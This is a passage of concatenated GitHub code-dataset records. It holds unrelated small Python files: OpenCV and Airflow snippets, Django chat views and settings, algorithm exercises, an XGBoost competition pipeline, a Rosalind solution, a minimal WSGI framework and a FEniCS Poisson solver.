cols))\n\nshow_images([rgb_img, zoom_img], titles=['Originial', 'Zoomed and Rectified'])\n\n# Thresholding\n## Some of the types for thresholds are\nret, thresh1 = cv.threshold(rgb_img, 127, 255, cv.THRESH_BINARY)\nret, thresh2 = cv.threshold(rgb_img, 127, 255, cv.THRESH_BINARY_INV)\nret, thresh3 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TRUNC)\nret, thresh4 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TOZERO)\nret, thresh5 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TOZERO_INV)\n\nshow_images([rgb_img, thresh1, thresh2, thresh3, thresh4, thresh5],\n titles=['Original', 'BINARY', 'BINARY_INV', 'TRUNC',\n 'TOZERO', 'TOZERO_INV'],\n cols=1)\n\n## And prebuild adaptive thresholds are\n","repo_name":"alejandroge/PyDocs","sub_path":"opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72354502010","text":"from typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"Memberstatuses1JsonBody\")\n\n\n@attr.s(auto_attribs=True)\nclass Memberstatuses1JsonBody:\n \"\"\"\n Attributes:\n name (Union[Unset, str]): Default: 'Non-Member'.\n is_member (Union[Unset, bool]):\n \"\"\"\n\n name: Union[Unset, str] = \"Non-Member\"\n is_member: Union[Unset, bool] = False\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n name = self.name\n is_member = self.is_member\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if name is not UNSET:\n field_dict[\"name\"] = name\n if is_member is not UNSET:\n field_dict[\"isMember\"] = is_member\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n name = d.pop(\"name\", UNSET)\n\n is_member = d.pop(\"isMember\", UNSET)\n\n memberstatuses_1_json_body = cls(\n name=name,\n is_member=is_member,\n )\n\n memberstatuses_1_json_body.additional_properties = d\n return memberstatuses_1_json_body\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"alxmrs/ngpvan-api-client","sub_path":"ngpvan_api_client/models/memberstatuses_1_json_body.py","file_name":"memberstatuses_1_json_body.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3043758558","text":"\"\"\"\nLocal settings\n\n- Run in Debug mode\n- Use console backend for emails\n- Add Django Debug Toolbar\n- Add django-extensions as app\n\"\"\"\nfrom .common import * # noqa: F403\n\nTEMPLATES[0]['OPTIONS']['debug'] = True # noqa: F405\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\", default='CHANGEME!!!') # noqa: F405\n\n# Mail settings\n# 
------------------------------------------------------------------------------\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.console.EmailBackend') # noqa: F405\n\n# CACHING\n# ------------------------------------------------------------------------------\nCACHES = {'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': ''}}\n\n# TESTING\n# ------------------------------------------------------------------------------\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\n# Your local stuff: Below this line define 3rd party library settings\nAWS_STORAGE_BUCKET_AI_NAME = env('DJANGO_AWS_STORAGE_BUCKET_AI_NAME', default=None) # noqa: F405\n\n# Disable Rate Limit\nWHITELIST_API_IP_ADDRESS = ['127.0.0.1']\n","repo_name":"KlubJagiellonski/pola-backend","sub_path":"pola/config/settings/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"19422598213","text":"import json\nfrom datetime import datetime\nfrom airflow.models import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\n\n# Read JSON file daily\ndef read_rules_daily(ti) -> None:\n updated_json = {}\n with open('data/case2.1/rules.json', 'r') as openfile:\n json_rule = json.load(openfile)\n with open('data/case2.1/sequence.json', 'r') as openfile:\n json_sequence = json.load(openfile)\n # Merge the two files into one and add a rule status param\n for x in json_sequence.get(\"seq\"):\n json_rule.get(x)[\"ruleStatus\"]=\"Pending\"\n updated_json[x]=json_rule.get(x)\n with open('data/case2.1/rulesDaily.json', 'w') as f:\n json.dump(updated_json,f)\n\n \nwith DAG(\n dag_id='read_rulesDaily',\n schedule_interval=None,\n start_date=datetime(2022, 7, 26),\n catchup=False\n) as dag:\n\n # get rules\n task_read_rules = PythonOperator(\n task_id='read_rules',\n python_callable=read_rules_daily,\n provide_context=True\n )\n\n # Trigger 2nd DAG\n task_schedule_service = TriggerDagRunOperator(\n task_id=\"trigger_Dag2\",\n trigger_dag_id=\"execute_rulesDaily\"\n )\n\n \n\ntask_read_rules>>task_schedule_service","repo_name":"AyanF/Airflow-dags","sub_path":"all dags/read_rulesDaily.py","file_name":"read_rulesDaily.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2941578952","text":"import requests\nfrom twilio.rest import Client\n\nVIRTUAL_TWILIO_NUMBER = \"your virtual twilio number\"\nVERIFIED_NUMBER = \"your own phone number verified with Twilio\"\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n","repo_name":"imr30/100DaysofCoding","sub_path":"Day33_Stock_News/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"793541213","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Message\n\n\n@login_required\ndef chat_list(request):\n cur_user_id = 
request.user.id\n query = '''\n SELECT u.id, username, count(m.sender_id) as cnt\n FROM auth_user u LEFT JOIN chat_message m ON\n u.id = m.sender_id AND m.is_red = False AND m.getter_id = %s\n GROUP BY u.id HAVING u.id <> %s\n '''\n chat_list = User.objects.raw(query, (str(cur_user_id), str(cur_user_id)))\n return render(request=request,\n template_name='chat/chat_list.html',\n context={'chats': chat_list})\n\n\n@login_required\ndef chat_page(request, pk):\n cur_user_id = request.user.id\n\n if request.method == 'GET':\n Message.objects.filter(sender_id=pk,\n getter_id=cur_user_id,\n is_red=False).update(is_red=True)\n\n if request.method == 'POST':\n print(request.POST)\n new_message = Message(sender_id=cur_user_id, getter_id=pk,\n text=request.POST['message'])\n new_message.send()\n\n query = query = '''\n SELECT id, sender_id, getter_id, sended_time, text\n FROM chat_message\n WHERE sender_id = %s AND getter_id = %s OR\n sender_id = %s AND getter_id = %s\n '''\n history = Message.objects.raw(query,\n (str(cur_user_id), pk, pk, str(cur_user_id)))\n\n return render(request=request,\n template_name='chat/chat_page.html',\n context={'history': history, 'cur_id': cur_user_id})\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n return redirect('chat_list')\n else:\n return render(request=request,\n template_name=\"registration/registration.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request=request,\n template_name=\"registration/registration.html\",\n context={\"form\": form})\n","repo_name":"gorban-lobs/simple_chat","sub_path":"chat_project/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39167335465","text":"class QueueTwoStacks(object):\n\n def __init__(self):\n self.in_stack = []\n self.out_stack =[]\n\n\n def enqueue(self,data):\n self.in_stack.append(data)\n\n\n def dequeue(self):\n if len(self.out_stack)==0:\n\n #Move all the data from in_stack to out_stack and then do a pop\n\n while len(self.in_stack )>0:\n pop_value= self.in_stack.pop()\n self.out_stack.append(pop_value)\n\n if len(self.out_stack) == 0:\n raise IndexError(\"Can't dequeue from empty stack\")\n \n return self.out_stack.pop()\n\n\ns1= QueueTwoStacks()\ns1.enqueue(12)\ns1.enqueue(1)\ns1.enqueue(2)\nprint(s1.in_stack)\ns1.enqueue(3)\ns1.enqueue(46)\n\nprint(s1.in_stack)\nprint(s1.dequeue())\nprint(s1.in_stack)\n\nprint(s1.out_stack)\n","repo_name":"basanneh/python_DataStructures","sub_path":"queuetwostacks.py","file_name":"queuetwostacks.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23247573839","text":"from os.path import join, dirname\nfrom dotenv import load_dotenv\n\n\nload_dotenv(join(dirname(__file__), \"../../.env\"))\n\nfrom config import HerokuManualLiveConfig\nimport server\n\n\ndef create():\n print(\"dropping... [1]\")\n server.db.drop_all() # drop previous schemas\n print(\"creating... [2]\")\n server.db.create_all() # load new schemas\n print(\"adding labels... [4]\")\n add_labels()\n print(\"adding roles... \")\n add_roles()\n print(\"adding users... [5]\")\n\n print(\"commiting... 
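The two-stack queue above dequeues in amortized O(1): each element crosses from in_stack to out_stack at most once. A quick FIFO sanity check using only the class as defined:

q = QueueTwoStacks()
for item in (1, 2, 3):
    q.enqueue(item)
assert q.dequeue() == 1          # oldest element comes out first
q.enqueue(4)                     # lands in in_stack while 2 and 3 wait in out_stack
assert [q.dequeue() for _ in range(3)] == [2, 3, 4]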
[10]\")\n server.db.session.commit()\n\n\nif __name__ == \"__main__\":\n if input(\"type 'production'\") == \"production\":\n app = server.init_app(HerokuManualLiveConfig)\n with app.app_context():\n from development.manual_db_utils.generate_new_user_db_heroku import (\n add_admin_user,\n )\n from development.manual_db_utils.generate_sample_db import (\n add_labels,\n add_roles,\n )\n\n create()\n","repo_name":"miquelvir/centrifuga4","sub_path":"development/manual_db_utils/generate_empty_db_heroku.py","file_name":"generate_empty_db_heroku.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5472798901","text":"# 주식가격(성공)\n# 정확성: 66.7\n# 효율성: 33.3\n# 합계: 100.0 / 100.0\nfrom collections import deque\n\n\ndef solution(prices):\n answer = []\n price_queue = deque(prices)\n\n while price_queue:\n price = price_queue.popleft()\n num = 0\n for p in price_queue:\n num += 1\n if price > p:\n break\n answer.append(num)\n\n return answer\n\n\ns = solution([1, 2, 3, 2, 3]) # [4, 3, 1, 1, 0]\nprint(s)\n","repo_name":"UJHa/Codeit-Study","sub_path":"프로그래머스/00_코딩테스트_고득점_Kit/02_스택,큐/4_주식가격/jinhwan.py","file_name":"jinhwan.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5239296259","text":"n1 = 0\nn2 = 1\n\ni = int(input(\"Insira um número para iniciar a Fibonacci: \"))\n\n\nprint('Sequência de Fibonacci:')\n\nprint('{} -> {}'.format(n1, n2), end = '')\n\ncont = 3\n\nwhile cont <= i:\n\n n3 = n1 + n2\n\n print('-> {}'.format(n3), end = '')\n\n n1 = n2\n\n n2 = n3\n\n cont += 1\n\nprint('\\nFIM')","repo_name":"Ruan-F-M/Projetos-Simples","sub_path":"Fibonacci/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967806686","text":"\"\"\"\n@description: 画二维码,\ndata format like\n0 0\n0 1\n0 2\n0 3\n0 4\n0 5\n0 6\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nf = open(\"flag.txt\", \"r\").readlines()\n\nx_li = []\ny_li = []\nfor i in range(len(f)):\n x_li.append(int(f[i].strip().split()[0]))\n y_li.append(int(f[i].strip().split()[1]))\n\nplt.scatter(x_li, y_li)\nplt.show()","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/misc/Misc_picture_QRCode_by_pillow_画二维码01coordinate2_by_matplotlib_pyplot_scatter.py","file_name":"Misc_picture_QRCode_by_pillow_画二维码01coordinate2_by_matplotlib_pyplot_scatter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"21036111323","text":"# coding: utf-8\nimport json\nfrom utils import CombineFeature, ReadExperimentLog, FilterFeature, IsDifferentDistribution, AddBlackFeature, ReadData\nfrom Model.InitModel import InitModel\nimport pdb\nimport xgboost as xgb\nimport numpy as np\n\ndef gen_config_Lightgbm():\n config = {'config_name': 1,\n 'note': '2018-07-17',\n\n 'feature_names': [],\n \"model\": {\n \"name\": \"Lightgbm\",\n \"model_params\": {\n 'objective': 'binary',\n 'boosting_type': 'gbdt',\n \"learning_rate\": 0.01,\n 'metrics': 'auc',\n 'scale_pos_weight': 1,\n 'num_leaves': 31,\n 'max_depth': 4,\n 'min_child_weight': 0,\n 'reg_lambda': 0.0,\n 'min_split_gain': 0,\n 'subsample_freq': 1,\n 'subsample': 1,\n 'colsample_bytree': 0.6,\n 'num_threads': 20,\n \"verbose\": 1,\n \"seed\": 2018,\n },\n \"train_params\": {\n 
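The deque solution above rescans the remaining prices for every element, which is O(n^2) in the worst case; a common O(n) alternative (a sketch, not the author's submission) keeps indices of not-yet-fallen prices on a stack:

def solution_stack(prices):
    answer = [0] * len(prices)
    stack = []                       # indices whose price has not fallen yet
    for i, price in enumerate(prices):
        while stack and prices[stack[-1]] > price:
            j = stack.pop()
            answer[j] = i - j        # price fell at second i
        stack.append(i)
    while stack:                     # survivors hold their price to the end
        j = stack.pop()
        answer[j] = len(prices) - 1 - j
    return answer

assert solution_stack([1, 2, 3, 2, 3]) == [4, 3, 1, 1, 0]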
\"num_boost_round\": 60000,\n \"early_stopping_rounds\": 1000,\n },\n },\n 'cv_params': {'shuffle': True,\n 'random_state': 100,\n 'n_splits': 5,\n },\n 'save_experiment_result': True,\n 'oof': True,\n \"ensemble_method\": 'mean',\n 'norm_feat_imp': True}\n return config\n\n\ndef gen_config_Xgboost():\n config = {'config_name': 1,\n 'note': '2018-07-18',\n 'feature_names': [],\n\n # [\"count_max_ftr51_in_month4\", \"count_max_ftr51_in_month9\", \"count_max_ftr51_in_month10\", \"count_max_ftr51_in_month11\"],\n\n \"model\": {\n \"name\": \"Xgboost\",\n \"model_params\": {\n 'objective': 'binary:logistic',\n # 'objective': 'rank:pairwise',\n 'learning_rate': 0.1,\n 'eval_metric': 'auc',\n 'scale_pos_weight': 1,\n # 'num_leaves': 31,\n 'max_depth': 4,\n 'gamma': 0,\n 'min_child_weight': 1,\n 'lambda': 1,\n 'alpha': 0,\n 'colsample_bytree': 0.7,\n 'subsample': 0.9,\n 'colsample_bylevel': 0.7,\n 'nthread': 20,\n 'silent': True,\n \"verbose\": 0,\n \"seed\": 2018,\n },\n \"train_params\": {\n \"num_boost_round\": 500,\n \"early_stopping_rounds\": 60,\n },\n },\n 'cv_params': {'shuffle': True,\n 'random_state': 100,\n 'n_splits': 5,\n },\n 'save_experiment_result': True,\n 'oof': True,\n \"ensemble_method\": 'mean',\n 'norm_feat_imp': True}\n return config\n\n\ndef gen_config_catboost():\n return\n\n\ndef gen_config_base(model_name):\n \"\"\"\n :param model_name:\n :return:\n \"\"\"\n if model_name == 'Xgboost':\n return gen_config_Xgboost()\n elif model_name == 'Lightgbm':\n return gen_config_Lightgbm()\n\n\ndef gen_config_feature(model_name, log_name_set, new_feature_hist_path, feature_batch_name_set, filter_black, add_new):\n \"\"\"\n 保留上一次实验的特征, 添加特征历史文件中的某批次特征, 选择模型基本参数, 过滤特征, 形成配置\n :param model_name: str\n :param log_name_set: int or str, 用于读取实验记录中的特征\n :param new_feature_hist_path: str, 新特征历史文件地址\n :param feature_batch_name_set: str, 如'20180102am'\n :param model_name: str, 模型名字,,如Lightgbm, Xgboost\n :return:\n \"\"\"\n # 1 读取基础配置\n base_config = gen_config_base(model_name)\n feature_names = base_config['feature_names']\n\n # 2 读取旧特征\n old_features = []\n for log_name in log_name_set:\n old_features += ReadExperimentLog(log_name)['config']['feature_names']\n\n # 3 根据批次, 添加新测试的特征\n new_features = []\n if add_new:\n for feature_batch_name in feature_batch_name_set:\n new_feature_dict = json.load(open(new_feature_hist_path))[feature_batch_name]\n for new_feature in new_feature_dict.keys():\n new_features.append(new_feature)\n\n feature_names = feature_names + old_features + new_features\n\n # 4 唯一和排序\n # feature_names = list(set(feature_names))\n # feature_names.sort()\n\n # 5 特征黑名单过滤\n if filter_black:\n feature_names = FilterFeature(feature_names)\n # 6 更新特征名并返回\n base_config['feature_names'] = feature_names\n\n # 7 不在黑名单的新特征, 有时会重复计算特征\n print('the size of feature name is ', len(feature_names))\n\n new_feature_list = [new_feature for new_feature in new_features if new_feature in feature_names]\n old_feature_list = [old_feature for old_feature in old_features if old_feature in feature_names]\n return base_config, new_feature_list, old_feature_list\n\n\ndef run(config):\n \"\"\"\n :param config: dict, 配置字典\n :return:\n \"\"\"\n # 1 根据配置合并特征\n Xtrain, Ytrain, Xtest = CombineFeature(config['feature_names'])\n\n # ------------------------\n train_id, test_id, train_data, test_data = ReadData(Ytrain=False, sort_by_time=True)\n Xtrain['PERSONID'] = train_id['PERSONID']\n Ytrain['PERSONID'] = train_id['PERSONID']\n Xtest['PERSONID'] = test_id['PERSONID']\n Xtrain.to_csv('Xtrain_xiao.csv', 
index=False)\n Ytrain.to_csv('Ytrain_xiao.csv', index=False)\n Xtest.to_csv('Xtest_xiao.csv', index=False)\n\n Xtrain.drop(['PERSONID'], axis=1, inplace=True)\n Ytrain.drop(['PERSONID'], axis=1, inplace=True)\n Xtest.drop(['PERSONID'], axis=1, inplace=True)\n # ------------------------\n\n # 2 根据配置初始化模型\n model = InitModel(Xtrain, Ytrain, Xtest, config)\n # 3 线下验证\n model.offline_validate()\n # 4 线上预测\n model.online_predict()\n # 保存实验结果\n if config['save_experiment_result']:\n model.save_experiment_result()\n # 6 返回线下验证分数以及显示预测结果\n\n # 保存模型\n for i, booster in enumerate(model.booster_offline_list):\n booster.save_model('xgb{}.m'.format(i))\n\n # 连接模型预测\n feature_names = list(Xtest.columns)\n xgb_test = xgb.DMatrix(Xtest[feature_names].values, feature_names=feature_names)\n\n submission_list = []\n for i, best_iter in enumerate([161, 292, 160, 246, 269]):\n load_model = xgb.Booster(model_file='xgb{}.m'.format(i))\n submission_list.append(load_model.predict(xgb_test, ntree_limit=best_iter))\n submission = np.mean(submission_list, axis=0)\n print(np.sum(np.abs(model.submission_online - submission)))\n\n return model.mean_score_offline, model.submission_online, model.fold_results\n\n\ndef select_feature(log_name, n, log_1):\n feature_names = []\n log = ReadExperimentLog(log_name)\n\n fold_results = log['result']['fold_results']\n for fold_result in fold_results:\n feats = [feat_tuple[0] for feat_tuple in sorted(fold_result['feature_importance_dict'].items(), key=lambda item: item[1])]\n feature_names += feats[-n:]\n\n feature_names = list(set(feature_names))\n print('The number of feature_names is ', len(feature_names))\n config = log['config']\n config['feature_names'] = feature_names\n config['config_name'] = log_1\n run(config)\n return feature_names\n\n\n\n\ndef main():\n # 用于特征测试以及特征选择\n # 0\n config_name = '57'\n config_note = 'gen_stats_value_ftr51'\n plot_new_feature = True\n plot_old_feature = True\n # 1 实验启动要素\n experiment_params = {\n 'model_name': 'Xgboost',\n 'log_name_set': [43],\n 'new_feature_hist_path': 'FeatureGenHistory/gen_stats_cost_diff_7d.json',\n 'feature_batch_name_set': ['20180730_am_{}'.format(i) for i in range(1,3)],\n 'filter_black': False,\n 'add_new':False}\n test_config, new_feature_list, old_feature_list = gen_config_feature(**experiment_params)\n # 3 配置名字\n test_config['config_name'] = config_name\n test_config['note'] = config_note\n # 4 运行该配置\n fold_results = run(test_config)[2]\n # pdb.set_trace()\n # 5 判断新测试的特征是否黑特征,添加到黑名单\n if plot_new_feature:\n for feature in new_feature_list:\n if feature in fold_results[0]['feature_importance_dict'].keys():\n try:\n print('feature importance is :', [fold_results[i]['feature_importance_dict'][feature] for i in range(5)])\n if IsDifferentDistribution(feature):\n AddBlackFeature([feature])\n except:\n print('error')\n # 6\n if plot_old_feature:\n for feature in old_feature_list:\n if feature in fold_results[0]['feature_importance_dict'].keys():\n try:\n print('feature importance is :', [fold_results[i]['feature_importance_dict'][feature] for i in range(5)])\n if IsDifferentDistribution(feature):\n AddBlackFeature([feature])\n except:\n print('error')\n\nmain()\n\n","repo_name":"datamininger/medicalinsurancefrauddetection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69953354490","text":"# https://rosalind.info/problems/corr/\n\n# 
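run() persists each fold's booster with save_model and later reloads it by file name; that round-trip can be checked in isolation (synthetic data and illustrative parameters only, independent of the competition features):

import numpy as np
import xgboost as xgb

X, y = np.random.rand(100, 4), np.random.randint(0, 2, 100)
dtrain = xgb.DMatrix(X, label=y)

model = xgb.train({'objective': 'binary:logistic'}, dtrain, num_boost_round=20)
model.save_model('xgb_check.m')

reloaded = xgb.Booster(model_file='xgb_check.m')
# a reloaded booster reproduces the in-memory predictions exactly
assert np.allclose(model.predict(dtrain), reloaded.predict(dtrain))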
https://github.com/cdeterman/Rosalind/blob/master/034_CORR/034_CORR.py\n\nfrom typing import List, Tuple\nfrom collections import Counter\n\nfrom data import load_fasta\nfrom utils import hamming_distance, reverse_complement\n\n\ndef load_data(filepath: str):\n return load_fasta(filepath)[1]\n\n\ndef seqs_expansion(seqs: str):\n expand_seqs = []\n for seq in seqs:\n expand_seqs.append(seq)\n expand_seqs.append(reverse_complement(seq))\n return expand_seqs\n\n\ndef correct_incorrect(counts, orig_seqs):\n correct = []\n incorrect = []\n for s in counts:\n if counts[s] >= 2:\n correct.append(s)\n elif s in orig_seqs:\n incorrect.append(s)\n return correct, incorrect\n\n\ndef error_correction(corrs: list, incorrs: list):\n correct_tuples = []\n for s1 in incorrs:\n for s2 in corrs:\n if hamming_distance(s1, s2) == 1:\n correct_tuples.append((s1, s2))\n return correct_tuples\n\n\ndef save_corrections(filepath: str, corrections: List[Tuple]):\n out = open(filepath, 'w')\n for s1, s2 in corrections:\n out.write(f\"{s1}->{s2}\\n\")\n out.close()\n print(f\"Save result to {filepath}.\")\n\n\nif __name__ == '__main__':\n path = \"datasets/034.corr.in\"\n outpath = \"./datasets/034.corr.out\"\n seqs = load_data(path)\n expand_seqs = seqs_expansion(seqs)\n counter = Counter(expand_seqs)\n corr_seqs, incorr_seqs = correct_incorrect(counter, seqs)\n corrections = error_correction(corr_seqs, incorr_seqs)\n save_corrections(outpath, corrections)\n","repo_name":"xwmp3/rosalind-python","sub_path":"bioinfomatics-stronghold/034.corr.py","file_name":"034.corr.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30916691207","text":"import os\nimport inspect\nfrom datetime import datetime, timedelta\n\nfrom werkzeug.routing import Map, Rule\nfrom werkzeug.wrappers import Request\nfrom werkzeug.exceptions import NotFound, HTTPException, MethodNotAllowed\nfrom parse import parse\nfrom requests import Session as RequestsSession\nfrom wsgiadapter import WSGIAdapter as RequestsWSGIAdapter\nfrom jinja2 import Environment, FileSystemLoader\nfrom whitenoise import WhiteNoise\n\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom .middleware import Middleware\nfrom .response import Response\nfrom .database import Database\nfrom .session import ClientSession\n\n\nclass Spatz:\n \"\"\"The Spatz WSGI Application Class.\n Including Jinga Template Engine, Whitenoise Static files management, SQLAlchemy ORM...\n\n You can replace the template engine or static files directory if you know well Jinga2 Template and whitenoise.\n \"\"\"\n\n # the default configuration\n default_config = {\n \"ENV\": None,\n \"DEBUG\": None,\n \"SECRET_KEY\": None,\n \"SESSION_COOKIE_NAME\": \"session\",\n \"SESSION_COOKIE_DOMAIN\": None,\n \"SESSION_COOKIE_PATH\": None,\n \"SESSION_COOKIE_HTTPONLY\": True,\n \"SESSION_COOKIE_SECURE\": False,\n \"SESSION_COOKIE_SAMESITE\": None,\n \"PERMANENT_SESSION_LIFETIME\": timedelta(days=1),\n }\n\n def __init__(self, templates_dir=\"templates\", static_dir=\"static\"):\n\n self.routes = Map()\n self.handlers = {}\n\n self.templates_env = Environment(\n loader=FileSystemLoader(os.path.abspath(templates_dir))\n )\n self.exception_handler = {}\n self.whitenoise = WhiteNoise(\n self.wsgi_app, root=static_dir, prefix=\"static/\", max_age=31536000\n )\n self.middleware = Middleware(self)\n self.db = Database(self)\n self.config = self.default_config.copy()\n\n # session interface\n 
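hamming_distance and reverse_complement are imported from the local utils module, which is not shown; minimal versions consistent with how they are used here (assumed implementations, checked against the classic Rosalind examples):

def hamming_distance(s1: str, s2: str) -> int:
    # positions at which two equal-length strings differ
    return sum(a != b for a, b in zip(s1, s2))

_COMPLEMENT = str.maketrans("ACGT", "TGCA")

def reverse_complement(seq: str) -> str:
    return seq.translate(_COMPLEMENT)[::-1]

assert hamming_distance("GAGCCTACTAACGGGAT", "CATCGTAATGACGGCCT") == 7
assert reverse_complement("AAAACCCGGT") == "ACCGGGTTTT"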
self.SessionInterface = ClientSession\n\n # cache interface\n self.CacheInterface = None\n\n def __call__(self, environ, start_response):\n return self.whitenoise(environ, start_response)\n\n def wsgi_app(self, environ, start_response):\n return self.middleware(environ, start_response)\n\n def add_route(self, rule, handler, endpoint=None, methods=[\"GET\"]):\n \"\"\"Add a URL Rule.\n\n :param url: the URL rule.\n :type url: str\n :param handler: the function handling a request\n :type handler: callable\n :param endpoint: the endpoint for registered URL rule, defaults to None\n :type endpoint: str, optional\n :param methods: allowed methods, defaults to [\"GET\"]\n :type methods: list, optional\n \"\"\"\n\n # check if the rule exists\n for r in self.routes.iter_rules():\n if rule == r.rule:\n raise AssertionError(\"Such URL already exists.\")\n\n if endpoint is None:\n endpoint = handler.__name__\n\n # class-based handler\n if inspect.isclass(handler):\n for method in [\"post\", \"put\", \"delete\"]:\n if hasattr(handler, method):\n methods.append(method)\n\n rule = Rule(rule, endpoint=endpoint, methods=methods)\n self.routes.add(rule)\n self.handlers[endpoint] = handler\n\n def route(self, rule, **kwargs):\n def wrapper(handler):\n self.add_route(rule, handler, **kwargs)\n return handler\n\n return wrapper\n\n def handle_request(self, request):\n \"\"\"Handle requests and dispatch the requests to view functions\n\n :param request: requests from clients\n :type request: webob.Request\n :return: responses from view functions\n :rtype: webob.Response\n \"\"\"\n response = Response()\n response.render = self.render\n\n urls = self.routes.bind_to_environ(request.environ)\n try:\n endpoints, kwargs = urls.match()\n handler = self.handlers[endpoints]\n\n # class-based handler\n if inspect.isclass(handler):\n handler = getattr(handler(), request.method.lower(), None)\n if not handler:\n raise MethodNotAllowed()\n\n handler(request, response, **kwargs)\n\n except HTTPException as e:\n return e\n\n return response\n\n def render(self, template_name, context=None):\n if context is None:\n context = {}\n return self.templates_env.get_template(template_name).render(**context)\n\n def default_response(self, response):\n response.status_code = 404\n response.text = \"Not Found.\"\n\n return response\n\n def test_session(self, base_url=\"http://testserver\"):\n session = RequestsSession()\n session.mount(prefix=base_url, adapter=RequestsWSGIAdapter(self))\n return session\n\n def add_middleware(self, middleware_cls):\n self.middleware.add(middleware_cls)\n","repo_name":"Max-Chou/spatz","sub_path":"spatz/spatz.py","file_name":"spatz.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26090731674","text":"import fenics\nimport numpy as np\n\n\nclass NeumannPoissonSolver:\n # Usage:\n # https://github.com/NickAlger/nalger_helper_functions/tree/master/jupyter_notebooks/neumann_poisson_solver.ipynb\n def __init__(me, function_space_V):\n me.V = function_space_V\n me.dof_coords = me.V.tabulate_dof_coordinates()\n\n f = fenics.Function(me.V)\n\n u = fenics.TrialFunction(me.V)\n v = fenics.TestFunction(me.V)\n a = fenics.inner(fenics.grad(u), fenics.grad(v)) * fenics.dx\n rhs = f * v * fenics.dx\n\n A = fenics.assemble(a)\n me.b = fenics.assemble(rhs)\n\n const_fct = fenics.Function(me.V)\n const_fct.interpolate(fenics.Constant(1.0))\n const_vec = const_fct.vector()\n me.const_vec = const_vec / 
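A short usage sketch of the routing API above, driven through test_session(); the route and handler names are illustrative, and Response is assumed to expose a writable text attribute, as default_response implies:

app = Spatz()

@app.route("/hello/<name>")
def hello(request, response, name):
    response.text = f"Hi, {name}!"   # assumed Response attribute, see default_response

client = app.test_session()
print(client.get("http://testserver/hello/ada").text)   # -> "Hi, ada!"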
